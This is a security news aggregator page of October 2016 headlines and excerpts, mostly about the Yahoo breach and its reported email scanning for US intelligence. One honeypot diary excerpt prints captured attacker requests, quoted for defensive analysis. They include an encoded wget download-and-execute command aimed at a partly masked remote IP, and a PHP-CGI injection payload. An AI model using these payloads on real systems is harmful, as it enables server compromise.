What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2016-10-13 03:00:22 | The Unforeseen Impact of Unforeseen Risk (lien direct) | It has been a long time since Yahoo has been number one in any market but in September 2016, it “achieved” a new distinction: the single largest public data breach in human history. The numbers are astonishing, with tectonic shift-like potential implications for companies and organizations of all kinds: 500 million+ accounts affected. $4.8 billion […]… Read More | Yahoo | ||
 |
2016-10-12 15:21:46 | WTF Yahoo/FISA search in kernel? (lien direct) | A surprising detail in the Yahoo/FISA email search scandal is that they do it with a kernel module. I thought I'd write up some (rambling) notes.What the government was searching forAs described in the previoius blog post, we'll assume the government is searching for the following string, and possibly other strings like it within emails:### Begin ASRAR El Mojahedeen v2.0 Encrypted Message ###I point this out because it's simple search identifying things. It's not natural language processing. It's not searching for phrases like “bomb presidentâ€.Also, it's not AV/spam/childporn processing. Those look at different things. For example, filtering message containing childporn involves calculating a SHA2 hash of email attachments and looking up the hashes in a table of known bad content. This is quite different from searching.The Kernel vs. User SpaceOperating systems have two parts, the kernel and user space. The kernel is the operating system proper (e.g. the “Linux kernelâ€). The software we run is in user space, such as browsers, word processors, games, web servers, databases, GNU utilities [sic], and so on.The kernel has raw access to the machine, memory, network devices, graphics cards, and so on. User space has virtual access to these things. The user space is the original “virtual machinesâ€, before kernels got so bloated that we needed a third layer to virtualize them too.This separation between kernel and user has two main benefits. The first is security, controlling which bit of software has access to what. It means, for example, that one user on the machine can't access another's files. The second benefit is stability: if one program crashes, the others continue to run unaffected.Downside of a Kernel ModuleWriting a search program as a kernel module (instead of a user space module) defeats the benefits of user space programs, making the machine less stable and less secure.Moreover, the sort of thing this module does (parsing emails) has a history of big gapping security flaws. Parsing stuff in the kernel makes cybersecurity experts run away screaming in terror.On the other hand, people have been doing security stuff (SSL implementations and anti-virus scanning) in the kernel in other situations, so it's not unprecedented. I mean, it's still wrong, but it's been done before.Upside of a Kernel ModuleIf doing this is as a kernel module (instead of in user space) is so bad, then why does Yahoo do it? It's probably due to the widely held, but false, belief that putting stuff in the kernel makes it faster.Everybody knows that kernels are faster, for two reasons. First is that as a program runs, making a system call switches context, from running in user space to running in kernel space. This step is expensive/slow. Kernel modules don't incur this expense, because code just jumps from one location in the kernel to another. The second performance issue is virtual memory, where reading memory requires an extra step in user space, to translate the virtual memory address to a physical one. Kernel modules access physical memory directly, without this extra step.But everyone is wrong. Using features like hugepages gets rid of the cost of virtual memory translation cost. There are ways to mitigate the cost of user/kernel transitions, such as moving data in bulk instead of a little bit at a time. Also, CPUs have improved in recent years, dramatically reducing the cost of a kernel/user transition.The problem we face, though, is inertia. Everyone knows moving modules into the kernel makes things faster. It's hard getting them to un-learn what they've been taught.Also, following this logic, Yahoo may already hav | Yahoo | ||
 |
2016-10-12 12:42:15 | Yahoo accused of deliberately making it hard to close your account (lien direct) |  It's not as easy to up sticks and leave your Yahoo account for dead as it used to be...
|
Yahoo | ||
 |
2016-10-11 12:55:57 | Yahoo won\'t let you forward your emails to another service – but why? (lien direct) | Yahoo has "temporarily disabled" its mail forwarding. Security review to encourage staying, or lock-in pressure to discourage leaving? |
Yahoo | ||
|
2016-10-11 11:05:27 | Yahoo wants to spy on you through advertising billboards (lien direct) | Yahoo has filed a patent for a billboard that would spy on the people watching it in a bid to tailor the ads that it shows.  |
Yahoo | ||
 |
2016-10-11 06:55:00 | Yahoo Mail suspends automatic mail forwarding as privacy controversies swirl (lien direct) | In what can only be called awfully suspicious timing, Yahoo has turned off automatic email forwarding-a crucial feature when changing email accounts-for Yahoo Mail users. Anyone who has already enabled the feature is not affected, but others cannot activate it.On its help pages, Yahoo says mail forwarding is currently under development. “While we work to improve it, we've temporarily disabled the ability to turn on Mail Forwarding for new forwarding addresses,†the help page says.To read this article in full or to leave a comment, please click here | Yahoo | ||
 |
2016-10-11 00:51:07 | Yahoo Disables Email Auto-Forwarding; Making It Harder for Users to Move On (lien direct) | Yahoo! has disabled automatic email forwarding -- a feature that lets its users forward a copy of incoming emails from one account to another.
The company has faced lots of bad news regarding its email service in past few weeks. Last month, the company admitted a massive 2014 data breach that exposed account details of over 500 Million Yahoo users.
If this wasn't enough for users to quit the
|
Yahoo | ||
|
2016-10-10 20:43:37 | Yahoo has a creepy plan for advertising billboards to spy on you (lien direct) |  The billboards would use a variety of sensor systems, including cameras and proximity technology, to capture real-time audio, video and even biometric information about potential target audiences.
David Bisson reports.
|
Yahoo | ||
 |
2016-10-10 14:58:42 | US required to declassify Yahoo spying order, say experts (lien direct) | The Freedom Act was passed last year in the wake of the Edward Snowden leaks. | Yahoo | ||
 |
2016-10-10 03:29:00 | 17 tools to protect your online security (lien direct) | Last month's news about the massive data breach at Yahoo, which affected at least 500 million user records, making it the largest data breach on record, might finally be what it takes to get the average internet user to take online security into their own hands - if only they knew how.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-09 21:34:53 | Spy program could have given hacker access to all Yahoo email, claims ex-employee (lien direct) |  According to a report in "The Intercept", the snooping code was implemented in such a way that it could have allowed a hacker to "basically read everyone's Yahoo mail."
|
Yahoo | ||
|
2016-10-09 19:38:21 | EU privacy watchdogs concerned by Yahoo\'s email scanning (lien direct) |  Privacy watchdogs based in the European Union are concerned Yahoo violated European users' privacy with its secret email-scanning program.
David Bisson reports.
|
Yahoo | ||
|
2016-10-08 02:28:24 | Yahoo Email Spying Scandal - Here\'s Everything that has Happened So Far (lien direct) | Today Yahoo! is all over the Internet, but in a way the company would never have expected.
It all started days ago when Reuters cited some anonymous sources and reported that Yahoo built a secret software to scan the emails of hundreds of millions of its users at the request of a U.S. intelligence service.
At this point, we were not much clear about the intelligence agency: the National
|
Yahoo | ||
 |
2016-10-07 18:15:00 | Verizon looking to slice $1B off its purchase price of Yahoo following massive breach, source (lien direct) | Verizon is attempting to negotiate down its bid to buy Yahoo, shaving off $1 billion from its $4.8 billion agreement to purchase Yahoo's internet business. |
Yahoo | ||
 |
2016-10-07 13:11:00 | Alien Eye in the Sky, Friday 7 October (lien direct) | It’s been a busy week in the land of information security. But don’t worry, we’ve got it all covered. Links to stories in video: Ransomware operator shut down Stealing an AI Nobody is bidding on shadowbrokers files US government IP address contract ends Don’t be Yahoo Verizon wants $1bn discount You don’t have to be stupid to work here Links to other interesting stories from the week MMD-0056-2016 - Linux/Mirai, how an old ELF malcode is recycled Hacker releases code that powered Botnet attack against Krebs Microsoft has announced it is to harden the edge browser for enterprise users A really sweet presentation format and great information for incident response and security operations teams by Frode Hommedal Thrillseekers stuck on rides at Universal Studios after massive power outage --- redundancy fail? Or all part of the show? Halvar flake was asked why he works in security – and gives a nice response. What he didn’t give was my 3 favourite answers. Good pay, Sponsorship money, and VC money What makes call-out culture so toxic? The three infrastructure mistakes your company must not make Hootsuite’s CEO on what he learned from getting hacked on social media AlienVault OTX Maltego Transforms In other news from the week: Singing for the Unsung Heroes of IT Security AlienVault was a proud sponsor of the 2016 | Guideline | Yahoo | |
|
2016-10-07 00:22:44 | Verizon wants $1 Billion Discount on Yahoo Acquisition Deal after Recent Scandals (lien direct) | It seems like it is not all over for Yahoo yet. Another day, another bad news for Yahoo!
Verizon, which has agreed to purchase Yahoo for $4.8 Billion, is now asking for a $1 Billion discount, according to recent reports.
The request comes after Verizon Communications learned about the recent disclosures about hacking and spying in past few weeks.
Just two weeks ago, Yahoo
|
Yahoo | ||
|
2016-10-06 17:40:02 | Verizon may want a $1 billion discount on Yahoo (lien direct) | Verizon may be getting cold feet with its acquisition of Yahoo. Reportedly, it's asking for a $1 billion discount on the original $4.8 billion deal for the Internet company.Recent news about Yahoo's massive data breach and its alleged secret email scanning program has diminished the company's value in the eyes of Verizon, according to a Thursday report by the New York Post.Tim Armstrong, the head of AOL, which Verizon acquired in 2015, reportedly has met with Yahoo executives about reducing the acquisition price. Â "He's pretty upset about the lack of disclosure and he's saying can we get out of this or can we reduce the price?" the report said, quoting what it called a source familiar with Verizon's thinking.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-06 17:00:00 | FBI sought terrorist email in Yahoo sweep (lien direct) | To comply with a directive from the Foreign Intelligence Surveillance Court to dig through all of its customers' email, Yahoo customized an already existing technology intended to search for child porn and spam. |
Yahoo | ||
|
2016-10-06 12:33:00 | What CSOs can learn from the Yahoo data breach (lien direct) | The IT security industry is still buzzing after news of a data breach at Yahoo in 2014, in which more than 500 million user accounts were hacked. In the latest episode of Security Sessions, I spoke with Kevin O'Brien, CEO and founder of GreatHorn, about the key takeaway topics that CSOs should learn from the Yahoo breach. Among the highlights of the video are the following sections: 1:09 Why is there such a gap between when the breach happened (2014) and when it was discovered/reported (now). 2:50 How CSOs can change/adjust their existing security policies around email. 4:40 What new phishing attacks can CSOs expect to see in the future based on this breach (and how will attacks get more sophisticated)?To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-06 10:51:00 | What CSOs can learn from the Yahoo breach (lien direct) | In the latest episode of Security Sessions, CSO Editor-in-chief Joan Goodchild talks about the implications of the Yahoo data breach, in which up to 500 million accounts were hacked. Joining Goodchild in the discussion is Kevin O'Brien, CEO and founder of GreatHorn, who offers advice to CSOs and other IT security leaders on ways to learn from this particular breach. | Guideline | Yahoo | |
 |
2016-10-06 09:37:20 | Checking my honeypot day, (Thu, Oct 6th) (lien direct) | A number of the handlers, including myself, run a number of honeypots around the planet. Unfortunately I dont get to play with them as much as I want to. There are a bunch of automated processes in place,but on occasion I have a honeypot day/night where I check how they are doing and to have a look to see what people are up to,aswell as take a look at the executables being pulled. The main systems I have going at the moment are aSSH honeypot (kippo, soon to be cowrie), and a plain oldweb server. Looking at the last month or so,there are a few interesting things popping up as well as the usual suspects. The following are the top 10 locations attacking the web server." /> A fairly mixed bunch. The attacks are mostly the general stuff, fairly typical for most organisations that have some sort of web presence. The site is empty so the only things we see are fully automated checks. These are requests like: (checking for file access)PROPFIND /webdav/ HTTP/1.1 (exploitation) GET /shell?%63%64%20%2F%74%6D%70%26%26%20%77%67%65%74%20%68%74%74%70%3A%2F%2F%32%32%32%2E%31%38%36%2E%32%31%2E%34%32%3A%33%33%38%39%30%2F%63%62%71%26%26%20%63%68%6D%6F%64%20%2B%78%20%63%62%71%26%26%20%2E%2F%63%62%71 which is --cd /tmp wget hxxp://222.186.xx.xx:33890/cbq chmod +x cbq ./cbq (the xx are mine) (admin tool access)GET //phpMyAdmin ..... Various types of requests (scanner)GET /muieblackcat HTTP/1.1 (scanning) GET /w00tw00t.at.ISC.SANS.DFind: (no that is not us) (file inclusion)POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E which is -- phppath/php?-d+allow_url_include=on+-d+safe_mode=off+-d+suhosin.simulation=on+-d+disable_functions=+-d+open_basedir=none+-d+auto_prepend_file=php://input+-n (openProxy Check)CONNECT mx-tw.mail.gm0.yahoodns.net:25 The locations containthe usual suspects (NL, PL CN). SG was a little bit of a surprise, likewise CA, I dont usually get traffic from those spots. The SSH logs were interesting although I had to make it the top 30. I suspect the pattern is relatively clear. Seems likeNanjingis a busy spot. Ive mentioned in a previous post (about a year ago) that the whole 222.186.0.0/16 subnet can easily be blocked and your SSH brute forcing attempts will go down significantly. Looks like the subnet is still heavily at it. This pattern is repeated on other honeypots in different regions. " /> On this particular honeypot I allow access when the correct password is provided. the top 10 in this case are as follows:" /> In this case a Russian IP address was the most active, although the actual location for the IP is in Prague (RU provider). They upload one stage which then fetches more nastiness. However, my honeypot doesnt take it that far. The CN locations seem more interested in just guessing passwords and not actually doing much more than that. Most of the actual conenctions are usually from the US, NL and DE (although NL must have been having a few bad months). On the password and userid front the main user accounts and passwords used were:"> Common users used Common passwords used | Yahoo | ||
|
2016-10-06 06:44:03 | EU privacy watchdogs have questions about Yahoo\'s secret email scanning (lien direct) | European Union privacy watchdogs are concerned by reports that Yahoo has been secretly scanning its users' email at the request of U.S. intelligence services."It goes far beyond what is acceptable," said Johannes Caspar, Commissioner for Data Protection and Freedom of Information in Hamburg, Germany.Reuters reported on Tuesday that Yahoo had built a system for U.S. government agencies to search all of its users' incoming emails. Other tech companies were quick to distance themselves, saying they would have challenged any such request in court.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-06 02:47:52 | What the Yahoo NSA might\'ve looked for (lien direct) | The vague story about Yahoo searching emails for the NSA was cleared up today with various stories from other outlets [1]. It seems clear a FISA court order was used to compel Yahoo to search all their customer's email for a pattern (or patterns). But there's an important detail still missing: what specifically were they searching for? In this post, I give an example.The NYTimes article explains the search thusly:Investigators had learned that agents of the foreign terrorist organization were communicating using Yahoo's email service and with a method that involved a “highly unique†identifier or signature, but the investigators did not know which specific email accounts those agents were using, the officials said.What they are likely referring it is software like "Mujahideen Secrets", which terrorists have been using for about a decade to encrypt messages. It includes a unique fingerprint/signature that can easily be searched for, as shown below.In the screenshot below, I use this software to type in a secret message: I then hit the "encrypt" button, and get the following, a chunk of random looking text: This software encrypts, but does not send/receive messages. You have to do that manually yourself. It's intended that terrorists will copy/paste this text into emails. They may also paste the messages into forum posts. Encryption is so good that nobody, not even the NSA, can crack properly encrypted messages, so it's okay to post them to public forums, and still maintain secrecy.In my case, I copy/pasted this encrypted message into an email message from one of my accounts and sent to to one of my Yahoo! email accounts. I received the message shown below: The obvious "highly unique signature" the FBI should be looking for, to catch this software, is the string:### Begin ASRAR El Mojahedeen v2.0 Encrypted Message ###Indeed, if this is the program the NSA/FBI was looking for, they've now caught this message in their dragnet of incoming Yahoo! mail. This is a bit creepy, which is why I added a plea to the message, in unencrypted form, asking them not to rendition or drone strike me. Since the NSA can use such signatures to search traffic from websites, as well as email traffic, there's a good change you've been added to their "list" simply for reading this blog post. For fun, send this blogpost to family or friends you don't particularly like, in order to get them on the watch list as well. |
Yahoo | ||
|
2016-10-05 19:30:00 | Secret compliance with FISA directive, massive breach spell trouble for Yahoo (lien direct) | Yahoo called a Reuters report that it allowed secret spying of its customers' email "misleading," but the privacy implications are being debated not only by the tech and legal communities but the public as well. |
Guideline | Yahoo | |
 |
2016-10-05 17:16:07 | DarkReading: Yahoo Reportedly Complied With US Intel Request To Search All Customer Emailshttp://ubm.io/2drSDCq (lien direct) | DarkReading: Yahoo Reportedly Complied With US Intel Request To Search All Customer Emailshttp://ubm.io/2drSDCq | Yahoo | ||
 |
2016-10-05 16:30:51 | Yahoo Slams Email Surveillance Story: Experts Demand Details (lien direct) | Yahoo calls a bombshell email surveillance story “misleading†as legal, civil liberties and security experts demand answers. | Guideline | Yahoo | |
 |
2016-10-05 16:10:02 | Amid Privacy Outcry, Yahoo Denies Surveillance Allegations (lien direct) | Yahoo on Wednesday denied conducting mass email surveillance after a report alleging it built a special scanning program at the behest of US intelligence which sparked an outcry from privacy activists. The report, which said the US internet giant had secretly scanned millions of emails to help American intelligence, was "misleading," Yahoo said in a statement. | Guideline | Yahoo | |
|
2016-10-05 16:06:20 | Yahoo\'s secret email scans helped the FBI probe terrorists (lien direct) | What Yahoo was looking for with its alleged email scanning program may have been signs of code used by a foreign terrorist group. The company was searching for a digital "signature" of a communication method used by a state-sponsored terrorist group, according to a new report from The New York Times that provided more details on Yahoo's email scanning.  The report on Wednesday report didn't identify the signature or say if it involved any cryptographic computer code. But the article said it was the U.S. Department of Justice, and not the National Security Agency, that had obtained a court order forcing Yahoo to comply. A Reuters report on Tuesday wasn't clear about what agencies were involved in the probe.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-05 13:55:15 | Yahoo allegedly scanned incoming emails for US intelligence (lien direct) | While the other tech giants rush to refute involvement Yahoo remains muted. |
Yahoo | ||
 |
2016-10-05 13:39:26 | Christopher Soghoian: This Yahoo/NSA scandal is another reminder to Silicon Valley. When the spying finally leaks, the US gov will leave you hanging in the wind. (lien direct) | Christopher Soghoian: This Yahoo/NSA scandal is another reminder to Silicon Valley. When the spying finally leaks, the US gov will leave you hanging in the wind. | Yahoo | ||
|
2016-10-05 10:30:00 | Yahoo Reportedly Complied With US Intel Request To Search All Customer Emails (lien direct) | Yahoo used secretly designed software to scan incoming emails at the behest of a US intelligence agency, says Reuters report. | Yahoo | ||
 |
2016-10-05 08:53:38 | Yahoo! : Jusqu\'à 3 milliards de comptes piratés ? (lien direct) |  L'affaire de piratage massif ayant touché Yahoo en 2012 n'est visiblement pas terminée. En effet, selon un ancien dirigeant de Yahoo! au fait de la politique de sécurité de la firme, le piratage informatique pourrait avoir permis de dérober six fois plus de comptes utilisateurs qu'annoncé... |
Yahoo | ||
|
2016-10-05 07:39:16 | Yahoo : Un espionnage de masse des courriels de ses utilisateurs pour les autorités (lien direct) |  Décidément, il s'agit d'une période hautement critique pour Yahoo! Après la révélation d'une immense fuite de données des utilisateurs, voila qu'une affaire d'espionnage des courriels pour le compte de la NSA et du FBI fait surface. |
Yahoo | ||
|
2016-10-05 07:30:06 | Yahoo calls report of secret email scanning \'misleading\' (lien direct) | Yahoo has called a Reuters article about a secret email scanning program "misleading," and said no such system exists. On Tuesday, the Reuters article claimed that Yahoo had created the custom software program after receiving a classified U.S. government order.  That software program is reportedly capable of scanning all incoming emails from Yahoo customers for information provided by U.S. intelligence officials.However, on Wednesday Yahoo disputed the report.“We narrowly interpret every government request for user data to minimize disclosure. The mail scanning described in the article does not exist on our systems," the company said in an email. To read this article in full or to leave a comment, please click here | Guideline | Yahoo | |
|
2016-10-05 07:13:00 | Cybersecurity companies\' stock rises in face of post-Yahoo hack (lien direct) | Major hacks, data breaches, and a rise in global cybercrime damages are seemingly responsible for a surge in the share prices of some publicly-traded cybersecurity companies.The Cybersecurity Stock Report, published quarterly by Cybersecurity Ventures, notes the PureFunds HACK ETF -- which covers 35 cyber firms -- is up 35 percent since February 2016, when it hit a low for the year.To read this article in full or to leave a comment, please click here | Yahoo | ||
 |
2016-10-04 22:56:14 | How Did the Feds Get Past Yahoo\'s Encryption? Yahoo! (lien direct) |  For Apple and now for Yahoo, stronger encryption only made government spying demands more aggressive. The post How Did the Feds Get Past Yahoo's Encryption? Yahoo! |
Yahoo | ||
|
2016-10-04 20:30:00 | Yahoo, complying with U.S. intelligence directive, searched emails (lien direct) | At the behest of a directive handed down by U.S. intelligence officials, Yahoo built a custom software program in secret to dig through the emails of all of its customers. |
Yahoo | ||
|
2016-10-04 20:05:08 | It\'s time to close your Yahoo account (lien direct) |  Hundreds of millions of Yahoo Mail accounts had their emails scanned on behalf of US intelligence, reports Reuters.
|
Yahoo | ||
|
2016-10-04 19:58:59 | The Yahoo-email-search story is garbage (lien direct) | Joseph Menn (Reuters) is reporting that Yahoo! searched emails for the NSA. The details of the story are so mangled that it's impossible to say what's actually going on.The first paragraph says this:Yahoo Inc last year secretly built a custom software program to search all of its customers' incoming emailsThe second paragraph says this:The company complied with a classified U.S. government demand, scanning hundreds of millions of Yahoo Mail accountsWell? Which is it? Did they "search incoming emails" or did they "scan mail accounts"? Whether we are dealing with emails in transmit, or stored on the servers, is a BFD (Big Fucking Detail) that you can't gloss over and confuse in a story like this. Whether searches are done indiscriminately across all emails, or only for specific accounts, is another BFD.The third paragraph seems to resolve this, but it doesn't:Some surveillance experts said this represents the first case to surface of a U.S. Internet company agreeing to an intelligence agency's request by searching all arriving messages, as opposed to examining stored messages or scanning a small number of accounts in real time.Who are these "some surveillance experts"? Why is the story keeping their identities secret? Are they some whistleblowers afraid for their jobs? If so, then that should be mentioned. In reality, they are unlikely to be real surveillance experts, but just some random person that knows slightly more about the subject than Joseph Menn, and their identities are being kept secret in order to prevent us from challenging these experts -- which is a violation of journalistic ethics.And, are they analyzing the raw information the author sent them? Or are they opining on the garbled version of events that we see in the first two paragraphs.It is not known what information intelligence officials were looking for, only that they wanted Yahoo to search for a set of characters. That could mean a phrase in an email or an attachment, said the sources, who did not want to be identified.What the fuck is a "set of characters"??? Is this an exact quote for somewhere? Or something the author of the story made up? The clarification of what this "could mean" doesn't clear this up, because if that's what it "actually means", then why not say this to begin with?What outsiders know about the NSA/FBI's ability to ask for strong selectors (email addresses). What what we don't know about is their ability to search all emails, regardless of account, for arbitrary keywords/phases. If that's what's going on, then this would be a huge story. But the story doesn't make it clear that this is actually what's going on -- just strongly implies it.There are many other ways to interpret this story. For example, the government may simply be demanding that when Yahoo satisfies demands for emails (based on email addresses), that it does so from the raw incoming stream, before it hits spam/malware filters. Or, they may be demanding that Yahoo satisfies their demands with more secrecy, so that the entire company doesn't learn of the email addresses that a FISA order demands. Or, the government may be demanding that the normal collection happen in real time, in the seconds that emails arrive, instead of minutes later.Or maybe this isn't an NSA/FISA story at all. Maybe the DHS has a cybersecurity information sharing program that distributes IoCs (indicators of compromise) to companies under NDA. Because it's a separate program under NDA, Yahoo would need to setup a email malware scanning system separate from their existing malware system in order to use those IoCs.My point is this: the story is full of mangled details that really tell us nothing. I can come up with multiple, unrelated s | Yahoo | ||
|
2016-10-04 19:15:00 | ALERT: Yahoo scanned all arriving customer email at gov\'t intel\'s behest, Reuters (lien direct) | Reuters is reporting that Yahoo complied with a government request for information by scanning Yahoo Mail accounts via custom-built software. |
Yahoo | ||
 |
2016-10-04 17:59:23 | Yahoo\'s CISO resigned in 2015 over secret e-mail search tool ordered by feds (lien direct) | Reuters: Yahoo "complied with a classified US government directive." | Yahoo | ||
|
2016-10-04 17:37:53 | US tech giants say they didn\'t do Yahoo-style email spying (lien direct) | Reports of a secret Yahoo program to search through customers' incoming emails has spurred other tech companies to deny ever receiving a similar request from the U.S. government.The program, reportedly created last year through a classified U.S. order, involves Yahoo searching through hundreds of millions of user accounts at the behest of the National Security Agency or FBI.Other U.S. tech companies, including Google, Microsoft, Twitter and Facebook, denied doing anything like it. Most also said they would challenge such a request in court.Privacy advocates said the government enlisting Yahoo to assist in email monitoring would be wrong.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-04 17:31:00 | Yahoo "scanned customer emails" under top-secret order (lien direct) | The request likely came from the National Security Agency. | Yahoo | ||
|
2016-10-04 12:02:06 | Yahoo Built a Secret Tool to Scan Your Email Content for US Spy Agency (lien direct) | Users are still dealing with the Yahoo's massive data breach that exposed over 1 Billion Yahoo accounts and there's another shocking news about the company that, I bet, will blow your mind.
Yahoo might have provided your personal data to United States intelligence agency when required.
Yahoo reportedly built a custom software programmed to secretly scan all of its users' emails for specific
|
Yahoo | ||
|
2016-10-04 11:47:19 | Yahoo may have allowed US government to search user emails (lien direct) | Yahoo has reportedly searched through all of its users' incoming emails with a secret software program that's designed to ferret out information for U.S. government agencies.The software program, which was created last year, has scanned hundreds of millions of Yahoo Mail accounts at the behest of the National Security Agency or FBI, according to a Tuesday report from Reuters.Yahoo reportedly created the program to comply with a U.S. classified government directive. It's unclear if the mass email searching program is still in use."Yahoo is a law-abiding company and complies with the laws of the United States," the company said in a statement.To read this article in full or to leave a comment, please click here | Yahoo | ||
|
2016-10-03 15:00:00 | C&C attacks used plain text to drop malware on Quora and Yahoo! Answers (lien direct) | Security researchers discovered a series of attacks that use written text on answers forums and other legitimate web sites to launch command and control instructions in order to implant malware and evade detection. |
Yahoo | ||
|
2016-10-01 02:38:21 | Uh oh, Yahoo! Data Breach May Have Hit Over 1 Billion Users (lien direct) | The massive data breach that Yahoo! confirmed to the world last week is claimed by the company to have been carried out by a "state-sponsored actor" in 2014, which exposed the accounts of at least 500 Million Yahoo users.
But, now it seems that Yahoo has downplayed a mega data breach and triying to hide it's own security blunder.
Recently the information security firm InfoArmor that analyzed
|
Yahoo | ||
|
2016-09-30 18:30:33 | Ransomware\'s busy week with new varieties and updates being debuted (lien direct) | With the massive Yahoo! data breach grabbing the cybersecurity headlines of late, it might be easy to forget criminals are still busy pushing ransomware with two new varieties being recently introduced and a one older type being revamped. |
Yahoo | ||
|
2016-09-30 17:26:23 | Security firm pours cold water on Yahoo\'s state-sponsored hack claim (lien direct) |  A security company has found evidence that suggests state-sponsored attackers may not have been responsible for the hack that saw 500 million Yahoo users' account details stolen.
David Bisson reports.
|
Yahoo | ||
|
2016-09-30 14:50:37 | Yahoo! Doesn\'t Revoke iOS Mail Access After Password Change (lien direct) | Users resetting their Yahoo! passwords might also want to check the list of authorized apps and devices, because iOS Mail will continue to have access to the account even after a password reset, researchers discovered. | Yahoo |
To see everything:
Our RSS (filtrered)
